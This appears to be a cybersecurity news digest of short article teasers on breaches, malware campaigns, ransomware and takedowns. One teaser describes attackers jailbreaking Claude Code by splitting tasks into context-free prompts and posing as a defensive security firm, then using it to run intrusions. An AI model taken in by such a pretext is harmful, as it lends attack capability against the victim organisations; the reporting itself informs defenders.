Kirsten Doyle

Real estate lender tech provider SitusAMC has confirmed it suffered a cyberattack on November 12 that impacted the sensitive personal information of clients of hundreds of some of the nation’s biggest banks, including JPMorgan Chase. The data exposed was related to residential mortgages. JPMorgan Chase, Citi, and Morgan Stanley are among those that have been notified that their client data may have been taken. In a statement, the company said: “Corporate data associated with certain of our clients’ relationships with SitusAMC, such as accounting records and legal agreements, has been impacted. Certain data relating to some of our clients’ customers may also have been impacted. The scope, nature,…

Researchers at Huntress are warning that a new wave of ClickFix attacks is using steganography to hide malware inside PNG images—an unusual twist in an already troubling social-engineering technique. ClickFix attacks rely on one simple move: convincing a user to open the Windows Run prompt and paste a malicious command. That manual action lets attackers bypass many traditional controls. What Huntress has now uncovered is a far more sophisticated execution chain sitting behind that simple trick, leading to infostealers such as LummaC2 and Rhadamanthys.  Attack Stages The campaign begins with familiar lures. Early versions mimicked generic “Human Verification” checkpoints. Newer ones, however, have gone all-in on a…

Salesforce says it has picked up unusual behaviour linked to Gainsight-published apps that customers deploy and manage in their own environments. The company’s investigation shows that this activity may have allowed unauthorized access to some customers’ Salesforce data through the app’s integration path. As soon as it detected the issue, Salesforce revoked every active access and refresh token tied to Gainsight apps and pulled those apps from the AppExchange while it continues the investigation. There’s no indication that the Salesforce platform itself was compromised. The activity points to the app’s external connection rather than a platform vulnerability. Salesforce has notified…

Trend Micro researchers are warning that bad actors are exploiting the weakest points in S3 environments: misconfigurations, leaked access keys, and relaxed encryption controls. Their latest analysis tracks five emerging ransomware variants built specifically to break, lock, or wipe cloud storage.  The playbook is different from traditional ransomware. Rather than dropping malware and encrypting files on a machine, attackers are weaponizing AWS’s features. Several variants use the Key Management Service or Server-Side Encryption to encrypt S3 objects at scale. One strain employs default AWS KMS keys to secure bucket data and then schedules the key for deletion, providing victims with…

A cluster of major websites (including X and ChatGPT) went down for large parts of Tuesday after Cloudflare, the backbone beneath much of the modern web, tripped over its own wiring. Shortly after 11:30 GMT, reports began to stack up on Downdetector. Thousands of users. Dozens of services. A quiet drumbeat turning into a roar. Pages froze. Apps hung. Routine clicks suddenly felt like walking through mud. Cloudflare later admitted the fault was theirs. A configuration file meant to sift hostile traffic misbehaved, triggering a crash in the software that keeps its wider network flowing. In the company’s words, it was…

Logitech has confirmed it suffered a data-theft breach tied to a zero-day in a third-party platform, days after the Clop extortion gang published almost 1.8 terabytes of data allegedly stolen from the company.  In a Form 8-K filed with the U.S. Securities and Exchange Commission, the consumer-electronics maker said it “recently experienced a cybersecurity incident relating to the exfiltration of data,” adding that the attack did not impact products, business operations, or manufacturing. Logitech says the stolen data “likely included limited information about employees and consumers and data relating to customers and suppliers,” and that it does not believe national ID numbers or payment…

A new wave of phishing attacks is exploiting Microsoft Entra’s guest user invitation system, turning a legitimate collaboration tool into a weapon for social engineering and credential theft, Cyber Security News reports.  Dubbed a TOAD (Telephone Oriented Attack Delivery) campaign, the attacks combine cloud-based account management with traditional phone scams, demonstrating a dangerous evolution in hybrid cybercrime tactics. Security researcher Michael Taggart uncovered the campaign after spotting multiple phishing operations abusing Entra’s guest invitation process. He said malefactors are weaponizing a trusted Microsoft service to bypass email security filters, combining cloud infrastructure abuse with classic phone scams, which makes detection extremely difficult. The campaign relies on Microsoft’s…

A Chinese state-sponsored cybercriminal group is believed to be behind what researchers say is the first documented cyber-espionage operation executed largely by AI rather than humans.   The campaign, detected in mid-September, used Anthropic’s Claude Code tool to probe and infiltrate around thirty organisations across tech, finance, chemicals, and government. According to Anthropic, the attackers leaned heavily on AI’s “agentic” features, using the model not as an assistant but as the primary operator of the campaign. The group broke Claude’s guardrails by feeding it fragmented, context-free prompts and posing as a legitimate cybersecurity firm conducting defensive testing.   Once jailbroken, the model performed reconnaissance, identified high-value data, wrote…

Notorious ransomware gang Clop is back with another bold claim, this time insisting it hacked “the NHS,” The Register reports. Which part of the sprawling UK healthcare system? The gang doesn’t say. It listed only the NHS.uk domain on its leak site on November 11 and published no data. For a system made up of hundreds of trusts, agencies, and regional bodies, that’s not much to go on. The extortion crew has spent recent months exploiting an Oracle E-Business Suite zero-day to hit private organizations. Adding “the NHS” to its victim roster sounds dramatic, but the lack of specifics raises a simple question: Does Clop…

Authorities have delivered another major hit to global cybercrime infrastructure, with more than 1,025 servers linked to three prolific malware operations taken down in the latest phase of Operation Endgame. Coordinated from Europol’s headquarters in The Hague between 10 and 13 November, the action targeted the infostealer Rhadamanthys, the Remote Access Trojan VenomRAT, and the botnet Elysium. All of these are key enablers behind large-scale international cyberattacks.   A suspect tied to VenomRAT was arrested earlier this month in Greece. Millions of Stolen Credentials Officials say the dismantled infrastructure had infected hundreds of thousands worldwide and had siphoned millions of stolen credentials. Investigators believe the main…